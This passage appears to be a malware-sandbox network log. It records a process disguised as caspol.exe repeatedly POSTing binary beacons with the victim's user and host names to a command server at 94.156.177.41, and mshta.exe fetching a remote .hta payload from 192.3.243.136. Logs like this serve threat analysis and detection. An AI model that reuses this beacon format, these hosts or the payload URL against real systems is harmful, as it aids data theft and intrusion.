                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:01.712006092 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:01 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    7 | 192.168.2.22 | 49172 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:01.985131025 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:01.990103006 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:02.731832027 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:02 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    8 | 192.168.2.22 | 49173 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:03.023063898 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:03.028263092 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:03.741231918 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:03 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    9 | 192.168.2.22 | 49174 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:04.453051090 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:04.458084106 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:05.310630083 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:05 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    10 | 192.168.2.22 | 49176 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:05.508730888 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:05.513581038 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:06.374385118 CET | 193 | IN | HTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:06 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    11 | 192.168.2.22 | 49177 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 20, 2024 07:57:07.048321962 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
                                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                                    Host: 94.156.177.41
                                                                    Accept: */*
                                                                    Content-Type: application/octet-stream
                                                                    Content-Encoding: binary
                                                                    Content-Key: A6A8C306
                                                                    Content-Length: 149
                                                                    Connection: close
                                                                    Nov 20, 2024 07:57:07.053236961 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                                    Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                                    Nov 20, 2024 07:57:07.917478085 CET193INHTTP/1.1 404 Not Found
                                                                    Server: nginx/1.26.1
                                                                    Date: Wed, 20 Nov 2024 06:57:07 GMT
                                                                    Content-Type: text/html; charset=utf-8
                                                                    Connection: close
                                                                    X-Powered-By: PHP/5.4.16
                                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                                    Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.22 | 49178 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:08.395258904 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:08.400151968 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:09.108309984 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.22 | 49182 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:09.283468008 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:09.288352966 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:10.035382032 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:09 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.22 | 49183 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:10.527065039 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:10.533828974 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:11.261435032 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:11 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.22 | 49184 | 192.3.243.136 | 80 | 3424 | C:\Windows\System32\mshta.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:10.540910959 CET | 509 | OUT | GET /xampp/swm/sw/greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.hta HTTP/1.1
Accept: */*
Accept-Language: en-US
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
If-Modified-Since: Wed, 20 Nov 2024 01:22:20 GMT
Connection: Keep-Alive
Host: 192.3.243.136
If-None-Match: "2c850-6274dfb369376"
Nov 20, 2024 07:57:11.112638950 CET | 275 | IN | HTTP/1.1 304 Not Modified
Date: Wed, 20 Nov 2024 06:57:10 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 20 Nov 2024 01:22:20 GMT
ETag: "2c850-6274dfb369376"
Accept-Ranges: bytes
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.22 | 49185 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:11.422688007 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:11.427592039 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:12.155327082 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.22 | 49186 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:12.352430105 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:12.359101057 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:13.064924955 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:12 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.22 | 49187 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:13.464530945 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:13.469417095 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:14.190033913 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:14 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.22 | 49188 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:14.816301107 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:14.821225882 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:15.539246082 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:15 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.22 | 49189 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:15.714570045 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:15.719444990 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:16.455482960 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:16 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.22 | 49190 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:16.621402025 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:16.626398087 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:17.347266912 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:17 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.22 | 49191 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:17.498769045 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:17.507138014 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:18.216984034 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.22 | 49192 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:18.360862017 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:18.365734100 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:19.096231937 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:18 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.22 | 49193 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:19.248756886 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:19.253732920 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:20.092386961 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:19 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.22 | 49194 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:20.468795061 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:20.473746061 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
Data Ascii: (ckav.ruAlbus849224ALBUS-PC0DE4229FCF97F5879F50F8FD3
Nov 20, 2024 07:57:21.191966057 CET | 193 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.26.1
Date: Wed, 20 Nov 2024 06:57:21 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.4.16
Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
Data Ascii: File not found.


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.22 | 49195 | 94.156.177.41 | 80 | 2596 | C:\Users\user\AppData\Roaming\caspol.exe
Timestamp | Bytes transferred | Direction | Data
Nov 20, 2024 07:57:21.594352007 CET | 245 | OUT | POST /simple/five/fre.php HTTP/1.0
User-Agent: Mozilla/4.08 (Charon; Inferno)
Host: 94.156.177.41
Accept: */*
Content-Type: application/octet-stream
Content-Encoding: binary
Content-Key: A6A8C306
Content-Length: 149
Connection: close
Nov 20, 2024 07:57:21.599286079 CET | 149 | OUT | Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 38 00 34 00 39 00 32 00 32 00 34 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
